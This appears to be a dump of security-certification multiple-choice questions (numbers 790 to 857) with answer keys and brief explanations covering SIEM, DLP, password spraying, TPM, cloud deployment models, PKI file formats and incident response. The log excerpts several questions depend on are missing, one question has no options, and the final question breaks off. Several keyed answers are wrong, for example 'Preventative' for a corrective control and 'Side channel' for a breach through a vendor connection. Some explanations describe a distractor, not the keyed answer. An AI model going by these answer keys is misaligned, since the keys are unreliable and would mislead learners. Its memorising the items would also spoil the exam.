Security orchestration, automation, and response (SOAR) is designed as a solution to the problem of the volume of alerts overwhelming analysts' ability to respond. A SOAR may be implemented as a standalone technology or integrated with a SIEM often referred to as a next-gen SIEM. The basis of SOAR is to scan the organization's store of security and threat intelligence, analyze it using machine/deep learning techniques, and then use that data to automate and provide data enrichment for the workflows that drive incident response and threat hunting.

Message-oriented middleware (MOM) is an architecture that enables the reception and relaying of messages between application components. It supports software deployment across several platforms and simplifies the process of developing applications that span multiple operating systems and network protocols.

END
QUESTION 790
Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

A. Set up hashing on the source log file servers that complies with local regulatory requirements, 
B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.
C. Write protect the aggregated log files and move them to an isolated server with limited access. 
D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

Answer: A

Log File Integrity Validation in AWS
This feature informs you on any modifications or deletions to CloudTrail logs. By using SHA-256 for hashing and SHA-256 with RSA for digital signing, AWS claims, “This makes it computationally infeasible to modify, delete, or forge CloudTrail log files without detection.”


END
QUESTION 791
A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST solution?

A. HIPS 
B. FlM 
C. TPM 
D. DLP

Answer: C

The analyst wants to check the integrity of the system, and boot attestation can take place. TPM chips have mechanisms to prevent system tampering and boot attestation can be done with TPM based hardware to verify the state of the firmware, bootloader, etc.

HIPS (Host Intrustion Prevention System) - An installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. This aims to stop malware by monitoring the behavior of code.

FIM (File Integrity Monitoring) - Technology that monitors and detects file changes that could be indicative of a cyberattack. FIM specifically involves examining files to see if and when they change, how they change, who changed them, and what can be done to restore those files if those modifications are unauthorized.

DLP (Data Loss Prevention) - A set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users.

END
QUESTION 792
A SOC operator is receiving continuous alerts from multiple Linux systems indicating that unsuccessful SSH attempts to a functional user ID have been attempted on each one of them in a short period of time. Which of the following BEST explains this behavior?

A. Rainbow table attack 
B. Password spraying 
C. Logic bomb
D. Malware bot

Answer: B 

Password Spraying is a variant of what is known as a brute force attack. In a traditional brute force attack, the perpetrator attempts to gain unauthorized access to a single account by guessing the password "repeatedly" in a very short period of time.

END
QUESTION 793
Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

A. Smart card
B. push notifications 
C. Attestation service
D. HMAC based, one time password

Answer: B

END
QUESTION 794
Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?

A. DLP 
B. NIDS 
C. TPM 
D. FDE

Answer: A

END
QUESTION 795
During a recent security incident at a multinational corporation a security analyst found the following logs for an account called user:










Which of the following account policies would BEST prevent attackers from logging in as user?

A. Impossible travel time 
B. Geofencing
C. Time based logins 
D. Geolocation

Answer: A

Impossible Travel is a calculation made by comparing a user's last known location to their current location, then assessing whether the trip is likely or even possible in the time that elapsed between the two measurements.
It can calculate the time it would take to travel from New York to Los Angeles and see it would be impossible to accomplish this within a minute.

END
QUESTION 796
Which of the following secure coding techniques makes compromised code more difficult for hackers to use?

A. Obfuscation 
B. Normalization 
C. Execution
D. Reuse

Answer: A

Normalization - Where an application accepts string input, the input should be subjected to normalization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This ensures that the string is in a format that can be processed correctly by the input validation routines. When user-generated strings are passed through different contexts in a web application—between HTTP, JavaScript, PHP, and SQL for instance—each with potentially different canonicalization schemes, it is extremely difficult to ensure that characters that would facilitate script injection by XSS have been rendered safe.

END
QUESTION 797
A security analyst has been tasked with finding the maximum amount of data loss that can occur before ongoing business operations would be impacted. Which of the following terms BEST defines this metric?

A. MTTR 
B. RTO 
C. RPO 
D. MTBF

Answer: C

A recovery point objective (RPO) identifies a point in time where data loss is acceptable and refers to databases or file restoration.

END
QUESTION 798
Which of the following control types fixes a previously identified issue and mitigates a risk?

A. Detective 
B. Corrective
C. Preventative 
D. Finalized

Answer: C

END
QUESTION 799
A security analyst is reviewing application logs to determine the source of a breach and locates the following log:



Which Of the following has been observed?

A. DLL Injection 
B. API attack
C. SQLi 
D. XSS

Answer: C

END
QUESTION 800
After a recent external audit, the compliance team provided a list of several non-compliant systems that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern?

A. PCI DSS 
B. GDPR
C. ISO 27001 
D. NIST CSF

Answer: A

NIST Cybersecurity Framework
A cybersecurity framework (CSF) is a list of activities and objectives undertaken to mitigate risks. The use of a framework 
allows an organization to make an objective statement of its current cybersecurity capabilities, identify a target level of capability,
and prioritize investments to achieve that target. This is valuable for giving a structure to internal risk management procedures 
and provides an externally verifiable statement of regulatory compliance. Frameworks are also important because they save
an organization from building its security program in a vacuum, or from building the program on a foundation that fails to account for important security concepts.

END
QUESTION 801
An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. 
These laptops would access the users' corporate operating system remotely and allow them to use the laptops 
for purposes outside of their job roles. Which of the following deployment models is being utilized?

A. MDM and application management 
B. BYOD and containers
C. COPE and VDI 
D. CYOD and VMs

Answer: C

Bring your own device (BYOD) - the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers.

Corporate owned, business only (COBO) - the device is the property of the company and may only be used for company business.

Corporate owned, personally-enabled (COPE) - the device is chosen and supplied by the company and remains its property. The employee may use it to access personal email and social media accounts and for personal web browsing (subject to whatever acceptable use policies are in force).

Choose your own device (CYOD) - much the same as COPE but the employee is given a choice of device from a list.

END
QUESTION 802
While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the following would provide the desired information?

A. arp
B. nslookup 
C. netstat 
D. nmap

Answer: C


END
QUESTION 803
An attacker has successfully exfiltrated several non-salted password hashes from an online system.
Given the logs below:











Which of the following BEST describes the type of password attack the attacker is performing?

A. Dictionary
B. Pass the hash 
C. Brute force
D. Password spraying

Answer: C

END
QUESTION 804
A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be done FIRST to prevent other users from accessing the malicious URL?

A. Configure the web content filter for the web address. 
B. Report the website to threat intelligence partners
C. Set the SIEM to alert for any activity to the web address.
D. Send out a corporate communication to warn all users of the malicious email.

Answer: A

END
QUESTION 805
An attacker browses a company's online job board attempting to find any relevant information regarding the technologies the company uses. Which of the following BEST describes this social engineering technique?

A. Hoax
B. Reconnaissance 
C. Impersonation 
D. pretexting

Answer: B

END
QUESTION 806
In a phishing attack, the perpetrator is pretending to be someone in a position of power to influence the target to click or follow the desired response. Which of the following principles is being used?

A. Authority 
B. Intimidation 
C. Consensus 
D. Scarcity

Answer: A

The principle of consensus or social proof refers to the fact that without an explicit instruction to behave in a certain way, 
many people will act just as they think others would act. A social engineering attack can use this instinct either to persuade 
the target that to refuse a request would be odd ("That's not something anyone else has ever said no to") or to exploit polite behavior to slip into a building while someone holds the door for them.





END
QUESTION 807
An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?





























Answer: A

END
QUESTION 808
A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The researchers collaborate with other machines using port 445 and, on the Internet, using port 443. The unauthorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. 
The security team has been instructed to resolve the problem as quickly as possible causing minimal disruption to the researchers. Which of the following contains the BEST course of action in this scenario?

A. Update the host firewalls to block outbound SMB.
B. Place the machines with the unapproved software in containment. 
C. Place the unauthorized application in a blocklist.
D. Implement a content filter to block the unauthorized software communication.

Answer: C

END
QUESTION 809
During a recent security assessment, a vulnerability was found in a common OS. 
The OS vendor was unaware of the issue and promised to release a patch within the next quarter. 
Which of the following BEST describes this type of vulnerability?

A. Legacy operating system 
B. Weak configuration
C. Zero day
D. Supply chain

Answer: C

Third-Party Risks - High-profile breaches have led to a greater appreciation of the importance of the supply chain in 
vulnerability management. A product, or even a service, may have components created and maintained by a long chain of different companies. Each company in the chain depends on its suppliers or vendors performing due diligence on
their vendors. A weak link in the chain could cause impacts on service availability and performance, or in the worst cases 
lead to data breaches.

END
QUESTION 810
A security analyst wants to reference a standard to develop a risk management program. 
Which of the following is the BEST source for the analyst to use?

A. SSAE SOC 2 
B. ISO 31000 
C. NIST CSF
D. GDPR

Answer: B

ISO 31000 - The ISO 31000 Risk Management framework is an international standard that provides businesses with guidelines and principles for risk management from the International Organization for Standardization. Regulatory compliance initiatives are usually specific to a particular country and applicable to certain sized businesses or businesses in specific industries. However, ISO 31000 is designed to be used in organizations of any size. Its concepts work equally well in the public and the private sector, in large or small businesses and nonprofit organizations.

END
QUESTION 811
Against the recommendation of the IT security analyst, a company set all user passwords on a server as `P@55w0rD`. Upon review of the /etc/passwd file, an attacker found the following:

alice:a8df3b6c4fd75f0617431fd248f35191df8d237f bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150

Which of the following BEST explains why the encrypted passwords do not match?

A. Perfect forward secrecy 
B. Key stretching
C. Salting 
D. Hashing

Answer: C 

Salting refers to adding random data to the input of a hash function to guarantee a unique output. The set password, in this case, is already hashed so to further secure it salting is the next step in cryptography i.e. adding more security to the password. 

Salting passwords is a common method of preventing rainbow table attacks, along with other password attacks such as brute force and dictionary attacks. A salt is a set of random data such as two additional characters. Password salting adds these additional characters to a password before hashing it. These additional characters add complexity to the password, and result in a different hash than the system would create using only the original password. This causes password attacks that compare hashes with a rainbow table to fail. Remember this Birthday attacks exploit collisions in hashing algorithms. A hash collision occurs when the hashing algorithm creates the same hash from different passwords. Salting adds random text to passwords before hashing them and thwarts many password attacks, including rainbow table attacks. 

Key stretching is an advanced technique used to increase the strength of stored passwords. Instead of just adding a salt to the password before hashing it, key stretching applies a cryptographic stretching algorithm to the salted password. The benefit of key stretching is that it consumes more time and computing resources—frustrating attackers who are trying to guess passwords. Three common key stretching techniques are bcrypt, Password-Based Key Derivation Function 2 (PBKDF2), and Argon2.

END
QUESTION 812
The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees' workstations to prevent information from leaving the company's network?

A. HIPS 
B. DLP 
C. HIDS 
D. EDR

Answer: B 

DLP enables businesses to detect data loss, as well as prevent the illicit transfer of data outside the organization and the unwanted destruction of sensitive or personally identifiable data (PII).

END
QUESTION 813
On the way into a secure building, an unknown individual strikes up a conversation with an employee. 
The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

A. Shoulder surfing
B. Watering-hole attack 
C. Tailgating
D. Impersonation

Answer: C 

Tailgating is following someone who has access to a secure into that area without having access yourself.
Shoulder surfing is looking at information that someone who has access to it is looking at over their shoulder /while they have it open to view when you shouldn't otherwise have access to that information. This sounds more like Tailgating than Shoulder surfing for sure.

END
QUESTION 814
A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

A. Input validation
B. Dynamic code analysis 
C. Fuzzing
D. Manual code review

Answer: B 

Dynamic analysis means that the application is tested under "real world" conditions using a staging environment.

END
QUESTION 815
A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches were uninstalled due to user impact. 
B. An adversary altered the vulnerability scan reports.
C. A zero-day vulnerability was used to exploit the web server. 
D. The scan reported a false negative for the vulnerability.

Answer: A 

A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not yet patched. So if it is patched, is not a zero-day.

END
QUESTION 816
Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility 
B. Chain of custody 
C. Non-repudiation 
D. Admissibility

Answer: B 

A chain of custody is a chronological paper trail documenting when, how, and by whom individual items of physical or electronic evidence - such as cell phone logs - were collected, handled, analyzed, or otherwise controlled during an investigation.

END
QUESTION 817
A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

A. Private cloud 
B. SaaS
C. Hybrid cloud 
D. IaaS
E. DRaaS
F. Fog computing

Answer: CF 

Many people use the terms fog computing and edge computing interchangeably because both involve bringing intelligence and processing closer to where the data is created.
Fog computing is a distributed form of cloud computing, in which the workload is performed on a distributed, decentralized architecture. Originally developed by Cisco, fog computing moves some of the work into the local space to manage latency issues, with the cloud being
less synchronous. In this form, it is similar to edge computing.

END
QUESTION 818 
A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. 
Which of the following BEST meets both requirements?

A. High availability
B. Application security 
C. Segmentation
D. Integration and auditing

Answer: D 

The integration of the appropriate level and quantity of security controls is a subject that is always being audited. 
Are the controls appropriate? Are they placed and used correctly? Most importantly, are they effective? 
These are standard IT audit elements in the enterprise. The moving of computing resources to the cloud does not change the need or intent of audit functions.

END
QUESTION 819
A security engineer must deploy two wireless routers in an office suite. 
Other tenants in the office building should not be able to connect to this wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?

A. WPS 
B. WPA2 
C. WAP 
D. HTTPS

Answer: B

WPA2 and CCMP The Wi-Fi Alliance developed Wi-Fi Protected Access 2 (WPA2) to replace earlier cryptographic protocols. WPA2 (also known as IEEE 802.11i) uses strong cryptographic protocols such as Advanced Encryption Standard (AES) and Counter-mode/CBC-MAC Protocol (CCMP).

END
QUESTION 820
A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

A. Enable the remote-wiping option in the MDM software in case the phone is stolen. 
B. Configure the MDM software to enforce the use of PINs to access the phone.
C. Configure MDM for FDE without enabling the lock screen.
D. Perform a factory reset on the phone before installing the company's applications.

Answer: B

END
QUESTION 821
A penetration tester is brought on site to conduct a full attack simulation at a hospital. 
The penetration tester notices a WAP that is hanging from the drop ceiling by its cabling and is reachable. 
Which of the following recommendations would the penetration tester MOST likely make given this observation?

A. Employ a general contractor to replace the drop-ceiling tiles. 
B. Place the network cabling inside a secure conduit.
C. Secure the access point and cabling inside the drop ceiling. 
D. Utilize only access points that have internal antennas

Answer: C

END
QUESTION 822
A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection and prevention?

A. NIDS 
B. HIPS 
C. AV
D. NGFW

Answer: B 

A host-based intrusion prevention system (HIPS) is a system or a program employed to protect critical computer systems containing crucial data against viruses and other Internet malware. Starting from the network layer all the way up to the application layer, HIPS protects from known and unknown malicious attacks.

END
QUESTION 823
An organization is repairing the damage after an incident. Which of the following controls is being implemented?

A. Detective 
B. Preventive 
C. Corrective
D. Compensating

Answer: C 

A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure that is deemed too difficult or impractical to implement at the present time.

END
QUESTION 824
An organization is tuning SIEM rules based on threat intelligence reports. 
Which of the following phases of the incident response process does this scenario represent?

A. Lessons learned 
B. Eradication
C. Recovery 
D. Preparation
Answer: D 

The preparation phase is when the organization is preparing for the attack. 
Tuning the SIEM is just providing the latest threat information to the system for preparation.

Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond 
2. Identification - Identifying the threat
3. Containment - Containing the threat 
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.

END
QUESTION 825
A company has a flat network that is deployed in the cloud. 
Security policy states that all production and development servers must be segmented. 
Which of the following should be used to design the network to meet the security requirements?

A. CASB 
B. VPC
C. Perimeter network 
D. WAF

Answer: B 

A virtual private cloud is an on-demand configurable pool of shared resources allocated within a public cloud environment, providing a certain level of isolation between the different organizations using the resources. 
Security policy states that all production and development servers must be segmented. 
You could use multiple VPCs within your cloud environment to segment the network.

END
QUESTION 826
A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack 
B. Installing a managed PDU
C. Using only a dual power supplies unit 
D. Increasing power generator capacity

Answer: B

The power circuits supplying grid power to a rack, network closet, or server room must be enough to meet the load capacity of all the installed equipment, plus room for growth. Consequently, circuits to a server room will typically be higher capacity than domestic or office circuits (30 or 60 amps as opposed to 13 amps, for instance). These circuits may be run through a power distribution unit (PDU). These come with circuitry to "clean" the power signal, provide protection against spikes, surges, and
brownouts, and can integrate with uninterruptible power supplies (UPSs). Managed PDUs support remote power monitoring functions, such as reporting load and status, switching power to a socket on and off, or switching sockets on in a particular
sequence.

END
QUESTION 827
A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a dedicated business partner connection to a vendor, who is not held to the same security control standards. Which of the following is the MOST likely source of the breach?

A. Side channel 
B. Supply chain
C. Cryptographic downgrade 
D. Malware

Answer: A

A side-channel attack (SCA) is a security exploit that attempts to extract secrets from a chip or a system. This can be achieved by measuring or analyzing various physical parameters. Examples include supply current, execution time, and electromagnetic emission. These attacks pose a serious threat to modules that integrate cryptographic systems. Indeed, many side-channel analysis techniques have proven successful in breaking an algorithmically robust cryptographic operation and extracting the secret key.

A cryptographic downgrade such as using SSLv3.0 instead of TLS V1.2 or 1.3 would suggest the company which lost the data has a lower security standard. The question implies they are held to a higher security standard.

END
QUESTION 828
A systems engineer is building a new system for production. 
Which of the following is the FINAL step to be performed prior to promoting to production?

A. Disable unneeded services.
B. Install the latest security patches. 
C. Run a vulnerability scan.
D. Encrypt all disks.

Answer: C

END
QUESTION 829
The Chief information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements?

A. SAML
B. TACACS+
C. Password vaults 
D. OAuth

Answer: B

RADIUS is used primarily for network access control. AAA services are also used for the purpose of centralizing logins for the administrative accounts for network appliances. This allows network administrators to be allocated specific privileges on each switch, router, access point, and firewall. Whereas RADIUS can be used for this network appliance administration role, the Cisco-developed Terminal Access Controller Access-Control System Plus (TACACS+) is specifically designed for this purpose
(https://www.cisco.com/c/en/us/support/docs/security-vpn/remote-authentication-dialuser-service-radius/13838-10.html):

END
QUESTION 830
A store receives reports that shoppers' credit card information is being stolen. Upon further analysis, those same shoppers also withdrew money from an ATM in that store. The attackers are using the targeted shoppers' credit card information to make online purchases. Which of the following attacks is the MOST probable cause?

A. Identity theft 
B. RFID cloning
C. Shoulder surfing 
D. Card skimming

Answer: D

Skimming - illegally installed on ATMs, point-of-sale (POS) terminals, or fuel pumps capture data or record cardholders' PINs.

END
QUESTION 831
Which of the following controls would be the MOST cost-effective and time-efficient to deter intrusions at the perimeter of a restricted, remote military training area? (Choose two.)

A. Barricades
B. Thermal sensors 
C. Drones
D. Signage
E. Motion sensors 
F. Guards
G. Bollards
Answer: AD

Guards would deter intrusions but the question suggests cost- effective. People can walk between bollards.

END
QUESTION 832
A Chief Information Officer is concerned about employees using company-issued laptops to steal data when accessing network shares. Which of the following should the company Implement?

A. DLP 
B. CASB 
C. HIDS 
D. EDR 
E. UEFI

Answer: A 

Most PCs and smartphones implement the unified extensible firmware interface (UEFI). 
UEFI provides code that allows the host to boot to an OS. UEFI can enforce a number of boot integrity checks.

END
QUESTION 833
A company's public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage displaying incorrect information. A quick nslookup search shows https://www.organization.com is pointing to 151.191.122.115. Which of the following is occurring?

A. DoS attack
B. ARP poisoning 
C. DNS spoofing
D. NXDOMAIN attack

Answer: C

The roadmap to every single computer on the Internet is held in DNS servers. The DNS NXDOMAIN flood attack attempts to make servers disappear from the Internet by making it impossible for clients to access the roadmap.
In this attack, the attacker floods the DNS server with requests for invalid or nonexistent records. The DNS server spends its time searching for something that doesn't exist instead of serving legitimate requests. The result is that the cache on the DNS server gets filled with bad requests, and clients can't find the servers they are looking for.

END
QUESTION 834
A dynamic application vulnerability scan identified that code injection could be performed using a web form. 
Which of the following will be the BEST remediation to prevent this vulnerability?

A. Implement input validations. 
B. Deploy MFA.
C. Utilize a WAF.
D. Configure HIPS.

Answer: A

Input validation is the primary defense for online attacks against public facing web servers. 
A web application firewall (WAF) Is secondary and additional protection.

END
QUESTION 835 
A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:



Which of the following types of attacks is being attempted and how can it be mitigated?

A. XSS, implement a SIEM 
B. CSRF, implement an IPS
C. Directory traversal implement a WAF 
D. SQL infection, implement an IDS

Answer: C

END
QUESTION 836
Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset Link. Which of the attacks is being used to target the company?

A. Phishing 
B. Vishing 
C. Smishing 
D. Spam

Answer: C 

Smishing is a type of phishing attack which begins with an attacker sending a text message to an individual. The message contains social engineering tactics to convince the person to click on a malicious link or send sensitive information to the attacker. Criminals use smishing attacks for purposes like: Learn login credentials to accounts via credential phishing Discover private data like social security numbers Send money to the attacker Install malware on a phone Establish trust before using other forms of contact like phone calls or emails Attackers may pose as trusted sources like a government organization, a person you know, or your bank. And messages often come with manufactured urgency and time-sensitive threats. This can make it more difficult for a victim to notice a scam.
Phone numbers are easy to spoof with VoIP texting, where users can create a virtual number to send and receive texts. If a certain phone number is flagged for spam, criminals can simply recycle it and use a new one.

END
QUESTION 837 
Which of the following involves the inclusion of code in the main codebase as soon as it is written?

A. Continuous monitoring 
B. Continuous deployment 
C. Continuous Validation 
D. Continuous integration

Answer: D

END
QUESTION 838
An information security manager for an organization is completing a PCI DSS self-assessment for the first time. 
Which of the following is MOST likely the reason for this type of assessment?

A. An international expansion project is currently underway.
B. Outside consultants utilize this tool to measure security maturity. 
C. The organization is expecting to process credit card information. 
D. A government regulator has requested this audit to be completed

Answer: C

END
QUESTION 839
A security engineer is hardening existing solutions to reduce application vulnerabilities. 
Which of the following solutions should the engineer implement FIRST? (Choose two.)

A. Auto-update 
B. HTTP headers
C. Secure cookies
D. Third-party updates 
E. Full disk encryption 
F. Sandboxing
G. Hardware encryption

Answer: AD

The OWASP Top Ten List is a well-known resource that highlights some of the most common and impactful vulnerabilities that appear in applications (with a focus on web applications). The current version of the OWASP Top Ten list was released in 2021 and includes the following ten vulnerabilities:

1.Broken Access Control 
2. Cryptographic Failures
3. Injection
4. Insecure Design
5.Security Misconfiguration
6 Vulnerable and Outdated Components
7. Identification and Authentication Failures
8. Software and Data Integrity Failures
9. Security Logging and Monitoring Failures
10. Server-Side Request Forgery

END
QUESTION 840
A security analyst reviews a company's authentication logs and notices multiple authentication failures. 
The authentication failures are from different usernames that share the same source IP address. 
Which of the password attacks is MOST likely happening?

A. Dictionary
B. Rainbow table 
C. Spraying
D. Brute-force

Answer: C

Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames.

END
QUESTION 841
An employee received multiple messages on a mobile device. 
The messages instructing the employee to pair the device to an unknown device. 
Which of the following BEST describes what a malicious person might be doing to cause this issue to occur?

A. Jamming
B. Bluesnarfing 
C. Evil twin
D. Rogue access point

Answer: B

Bluesnarfing refers to using an exploit in Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism. Even without an exploit, a short (4 digit) PIN code is vulnerable to brute force password guessing. Jamming causes a Denial of Service. Evil twin and Rogue access point suggests WiFi. 

END
QUESTION 842
A network engineer and a security engineer are discussing ways to monitor network operations. 
Which of the following is the BEST method?

A. Disable Telnet and force SSH.
B. Establish a continuous ping. 
C. Utilize an agentless monitor
D. Enable SNMPv3 with passwords.

Answer: C

Network Monitoring is monitoring the health and status of servers and devices on a network. Some solutions require a software agent to be installed on each monitored device. Agentless Network Monitoring will do the same monitoring, but does not require any software installed on target devices or servers. Agentless network monitoring is generally preferred because it requires no configuration changes to the target device, and does not add one more piece of software that has to be managed.


END
QUESTION 843
Which of the following authentication methods is considered to be the LEAST secure?

A. TOTP 
B. SMS 
C. HOTP
D. Token key

Answer: B

The Short Message Service (SMS) and Multimedia Message Service (MMS) are operated by the cellular network providers. They allow transmission of text messages and binary files. Vulnerabilities in SMS and the SS7 signaling protocol that underpins
it have cast doubt on the security of 2-step verification mechanisms.

END
QUESTION 844
Which of the following incident response steps occurs before containment?

A. Eradication 
B. Recovery
C. Lessons learned 
D. Identification

Answer: D

END
QUESTION 845
Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyber intrusions, phishing, and other malicious cyber activity?

A. Intelligence fusion 
B. Review reports
C. Log reviews 
D. Threat feeds

Answer: A

Intelligence fusion and threat data—threat hunting can be performed by manual analysis of network and log data, but this is a very lengthy process. An organization with a security information and event management (SIEM) and threat analytics platform can apply intelligence fusion techniques. The analytics platform is kept up to date with a TTP and IoC threat data feed. Analysts can develop queries and filters to correlate threat data against on-premises data from network traffic and logs. This process may also be partially or wholly automated using AI-assisted analysis and correlation.

END
QUESTION 846
Which of the technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring 
B. Honeynets
C. Tcp replay
D. Data loss prevention

Answer: D

Many Enterprise Protection Platforms (EPPs) include a data loss prevention (DLP) agent. This is configured with policies
to identify privileged files and strings that should be kept private or confidential, such as credit card numbers. The agent enforces the policy to prevent data from being copied or attached to a message without authorization.

END
QUESTION 847
As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. https://comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. https://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022 
C. https://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00
D. https://comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00

Answer: B

END
QUESTION 848
A security administrator wants to implement a program that tests a user's ability to recognize attacks over the organization's email system. Which of the following would be BEST suited for this task?

A. Social media analysis
B. Annual information security training 
C. Gamification
D. Phishing campaign

Answer: D

A phishing campaign training event means sending simulated phishing messages to users. 
Users that respond to the messages can be targeted for follow-up training.
 
Participants respond well to the competitive challenge of CTF events. This type of gamification can be used to boost security awareness for other roles too. Computerbased training (CBT) allows a student to acquire skills and experience by completing
various types of practical activities:

> Simulations—recreating system interfaces or using emulators so students can practice configuration tasks.

> Branching scenarios—students choose between options to find the best choices to solve a cybersecurity incident or configuration problem. 

END
QUESTION 849
A third party asked a user to share a public key for secure communication. 
Which of the following file formats should the user choose to share the key?

A. .pfx 
B. .csr 
C. .pvk 
D. .cer

Answer: D

A file with an extension .cer is responsible for storing some information about the owner certificate and the specific public key. 
This format of files cannot store the private keys and have the capacity to store only one certificate which is x509. 

PFX (personal information exchange) Windows file format for storing a private key and certificate data. 
The file can be password-protected.

CSR (certificate signing request) A Base64 ASCII file that a subject sends to a CA to get a certificate.

PVK is a proprietary Microsoft format that stores a cryptographic private key. 
PVK files are often password-protected. A PVK file may have an associated . spc (PKCS7) certificate file.

END
QUESTION 850
A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

A. Non-credentialed 
B. Web application 
C. Privileged
D. Internal

Answer: A

A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the OS or application. The view obtained is the one that the host exposes to an unprivileged user on the network. The test routines may
be able to include things such as using default passwords for service accounts and device management interfaces, but they are not given privileged access. While you may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn't have specific high-level permissions or total administrative access. 
Non-credentialed scanning is often the most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.

END
QUESTION 851
Which of the following identifies the point in time when an organization will recover data in the event of an outage?

A. ALE 
B. RPO 
C. MTBF 
D. ARO

Answer: B

END
QUESTION 852
Which of the following is required in order for an IDS and a WAF to be effective on https traffic?

A. Hashing
B. DNS sinkhole 
C. TLS inspection 
D. Data masking

Answer: C

SSL/TLS inspection enables the prevention of malware transmitted through encrypted connections. The data must be decrypted 
in order for the IDS and WAF to inspect the data. TLS Inspection allows you to decrypt TLS traffic so that it can be inspected.

END
QUESTION 853
Which of the following BEST describes a technique that compensates researchers for finding vulnerabilities?

A. Penetration testing 
B. Code review
C. Wardriving 
D. Bug bounty

Answer: D

END
QUESTION 854
A security architect is implementing a new email architecture for a company. Due to security concerns, the Chief Information Security Officer would like the new architecture to support email encryption, as well as provide for digital signatures. Which of the following should the architect implement?

A. TOTP 
B. IMAP 
C. https
D. S/MIME

Answer: D

END
QUESTION 855
Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule 
B. Closed-circuit television 
C. Proximity card reader 
D. Faraday cage

Answer: A

END
QUESTION 856
A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but haven’t been. 
Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work.
B. An incorrect browser has been detected by the SAML application.
C. The access device has a trusted certificate installed that is overwriting the session token.
D. The user's IP address is changing between logins, but the application is not invalidating the token.

Answer: D

END
QUESTION 857
The help desk has received calls from users in multiple locations who are unable to access core network services. 
The network team has identified the problem and turned off the network switches using remote commands. 
Which of the following actions should the network team take NEXT?

